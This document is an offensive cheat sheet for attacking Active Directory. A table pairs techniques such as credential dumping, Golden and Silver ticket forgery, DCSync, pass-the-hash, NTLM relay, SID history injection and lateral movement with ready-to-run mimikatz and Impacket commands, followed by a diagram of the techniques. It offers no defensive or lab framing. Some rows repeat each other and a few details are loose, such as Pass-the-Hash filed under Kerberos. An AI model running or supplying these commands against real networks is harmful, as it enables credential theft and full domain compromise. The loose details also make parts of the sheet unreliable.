Attack AD

Technique	Description	Example Command
Enumeration	Gathering information about the Active Directory environment, including users, groups, and computers.	`ldapsearch -x -h <DC_IP> -b "dc=example,dc=com"`
Kerberos Attacks	Exploiting the Kerberos authentication protocol, including techniques like Kerberoasting and Pass-the-Ticket.	`Invoke-Kerberoast` (PowerShell script)
LDAP Enumeration	Using LDAP to enumerate users, groups, and other objects in the directory.	`ldapsearch -x -h <DC_IP> -b "dc=example,dc=com"`
Password Dumping	Extracting password hashes from memory, registry, or database files.	`secretsdump.py <domain>/<user>@<dc_ip>`
Pass-the-Hash	Using an extracted hash to authenticate as a user without needing their plaintext password.	`pth-winexe -U <domain>/<user>%<hash> //<target_ip> cmd`
Pass-the-Ticket	Using a stolen Kerberos ticket to authenticate as a user.	`Invoke-Mimikatz -Command '"kerberos::ptt <ticket>"'`
Silver Ticket Attack	Forging Kerberos TGS tickets to gain access to specific services.	`Invoke-Mimikatz -Command '"kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /target:<server> /rc4:<key>"'`
Golden Ticket Attack	Forging Kerberos TGT tickets to gain control of the entire domain.	`Invoke-Mimikatz -Command '"kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /krbtgt:<hash>"'`
DCSync Attack	Mimicking the behavior of a Domain Controller to extract credentials from the AD database.	`Invoke-Mimikatz -Command '"lsadump::dcsync /user:<user>"'`
BloodHound	Using the BloodHound tool to analyze AD relationships and identify attack paths.	`Invoke-BloodHound -CollectionMethod All`
Abusing Trust Relationships	Exploiting trust relationships between domains to escalate privileges or move laterally.	`nltest /domain_trusts`
GPO Abuse	Exploiting or modifying Group Policy Objects to gain elevated privileges or persistence.	`gpresult /r` to review applied policies.
Domain Trust Exploitation	Abusing trust relationships between domains to compromise additional domains.	`nltest /domain_trusts`
Credential Theft	Stealing credentials from memory, SAM, or LSASS.	`mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"`
SID History Injection	Adding a SID to an account's SID history to escalate privileges.	`Invoke-Mimikatz -Command '"sid::add /user:<user> /domain:<domain> /sid:<sid>"'`
NTLM Relay Attack	Relaying NTLM authentication to execute code on another machine.	`ntlmrelayx.py -t smb://<target_ip>`
Lateral Movement	Moving from one compromised machine to others within the network.	`wmiexec.py <domain>/<user>@<target_ip>`

graph TD
    A[Active Directory Attack Techniques]
    
    subgraph "Enumeration and Information Gathering"
        A --> B[Enumeration]
        B --> C[LDAP Enumeration]
    end
    
    subgraph "Kerberos and Credential Attacks"
        A --> D[Kerberos Attacks]
        D --> E[Pass-the-Ticket]
        D --> F[Pass-the-Hash]
        D --> G[Golden Ticket Attack]
        D --> H[Silver Ticket Attack]
        D --> I[DCSync Attack]
    end
    
    subgraph "Credential Dumping and Theft"
        A --> J[Password Dumping]
        J --> K[Credential Theft]
    end
    
    subgraph "Abuse and Exploitation"
        A --> L[GPO Abuse]
        A --> M[Domain Trust Exploitation]
        A --> N[Abusing Trust Relationships]
        A --> O[SID History Injection]
    end
    
    subgraph "Tools and Lateral Movement"
        A --> P[BloodHound]
        A --> Q[NTLM Relay Attack]
        A --> R[Lateral Movement]
    end